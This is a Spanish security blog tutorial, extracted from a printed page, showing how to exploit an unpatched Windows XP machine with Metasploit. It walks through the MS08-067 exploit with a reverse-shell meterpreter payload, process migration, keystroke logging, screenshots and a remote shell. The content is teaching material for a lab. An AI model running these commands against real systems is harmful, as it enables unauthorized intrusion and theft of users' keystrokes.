explotar vulnerabilidades con kali y meterpreter
TRANSCRIPT
-
Alejandro Fernndez-Trejo L
Ver todo mi perfil
+10m
PRINCIPAL NOTICIAS HARDWARE TUTORIALES JUEGOS
LUNES, 28 DE OCTUBRE DE 2013
Hemos descubierto una vulnerabilidad en un sistema Windows XP por no tener el sistema
operativo actualizado, vamos a explotar esa vulnerabilidad con el live CD de Kali y
meterpreter.
Una vez arrancada la mquina Kali y configurado la red abrimos la terminal y ejecutamos el
comando
- msfconsole
Tardar un poco. Una vez que termine usamos el exploit para la vulnerabilidad que hemos
encontrado, que en este caso es ms08_067_netapi, con el comando:
- use exploit /windows/smb/ms08_067_netapi
Y mediante el comando
- show options
Vemos las opciones que hay que configurar del exploit.
POSTED BY : ALEJANDRO FERNNDEZ-TREJO LUNA
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
1 de 8 15/07/2014 07:52 p.m.
-
Hackear redes Wifi con Kali y w
Ataque Man In The Middle con
Clonacin de sitio web con Kali
se-toolkit
Programar apagado del sistema
Windows 8.1
Explotar vulnerabilidades con K
meterpreter.
Pero antes de
rellenar las opciones cargaremos el PAYLOAD meterpreter, con el que aprovecharemos la
vulnerabilidad, con el comando:
- set PAYLOAD windows/meterpreter/reverse_tcp
Tras esto configuramos las distintas opciones:
- set RHOST 192.168.100.2(IP de la vctima)
- set LHOST 192.168.100.1(IP del atacante)
Ahora ejecutamos el comando
- exploit
Para acceder a la mquina victima.
Migrar a otro proceso.Ahora en el equipo victima abrimos el navegador Internet Explorer.
Account Sign UpConnect With Your FriendsOnline. Join the Facebook
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
2 de 8 15/07/2014 07:52 p.m.
-
Tutoriales(10) Seguridad(6) gameplayOperativoshardwareaccion (3)(3) tarjetas graficas
Vamos a la mquina
Kali con el comando:
- ps (para ver el ID
del proceso)
- migrate
Nos cambiamos al proceso de Internet Explorer
Keylogger
Ejecutamos el comando:
- keyscan_start
Para que empiece a guardar todo lo que sea escrito en Internet Explorer por teclado. Vamos
al equipo Windows XP y escribimos algo en la barra de direcciones.
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
3 de 8 15/07/2014 07:52 p.m.
-
Vamos de nuevo a Kali y ejecutamos el comando:
- keyscan dump
Para mostrar lo que ha sido capturado
Con el comando:
- keyscan_stop
Dejamos de capturar.
Captura de pantallaPara hacer una captura de pantalla con meterpreter solo tenemos que introducir el comando
screenshot + la direccin IP de la victima
- screenshot 192.168.100.2
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
4 de 8 15/07/2014 07:52 p.m.
-
Podemos ver las
capturas de pantalla en
la carpeta /root
Obtener shell de WinXp y crear fichero en escritorio.
Usamos el comando:
- shell
Para que nos devuelva la shell de la mquina de Windows XP, tras esto con el
comado cd nos movemos hasta el escritorio.
Ahora mediante el comando echo "cadena de texto que queramos" > (redireccion hacia el
fichero que vamos a crear) fichero.txt
Crearemos un fichero en el escritorio de WinXP.
Mediante el comando dir podemos ver el contenido de la carpeta Escritorio y como esta
creado el fichero.
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
5 de 8 15/07/2014 07:52 p.m.
-
Comparte
Volver a la pgina principal
Informtica , Kali , Meterpreter , Seguridad , Sistemas Operativos , Tutoriales ,
Vulnerabilidades , Windows XP
Explotar vulnerabilidades con Kali y meterpreter.
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
6 de 8 15/07/2014 07:52 p.m.
-
Configuracin de red en VirtualBox
Creacin de una mquina virtual con Virtual Box
Recuperacin de Datos
VIRTUAL BOX CON DOS SISTEMAS OPERATIVOS
Hackear redes Wifi con Kali y wifite
Clonacin sitio web con se-toolkit y Man In The Middle con DNS Spoofing
Clonacin de sitio web con Kali y se-toolkit
Ataque Man In The Middle con Ettercap
Explotar vulnerabilidades con Kali y meterpreter.
Google Hacking - Busqueda de informacin.
Programar apagado del sistema en Windows 8.1
Instalar un Sistema Operativo desde un Pendrive.
Servidor de Mensajeria Openfire 2Parte
Servidor de Mensajeria Openfire
Secunia - Actualizaciones del sistema.
Instalacin y configuracin del servicio FTP en Linux con VSFTPD.
Informtica, Kali, Meterpreter, Seguridad, Sistemas Operativos, Tutoriales, Vulnerabilidades,
Windows XP
Deja un Comentario
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
7 de 8 15/07/2014 07:52 p.m.
-
NEXTEntradas Anteriores
Comentar como:
Publicar
Subscribete al Post | Subscribete a los Comentarios
FacebookAccount Sign Up
Connect With Your FriendsOnline. Join the Facebook
Community - Free!
Explotar vulnerabilidades con Kali y meterpreter. http://infyseg.blogspot.com/2013/10/explotar-vulnerabilidades-con-kali-y...
8 de 8 15/07/2014 07:52 p.m.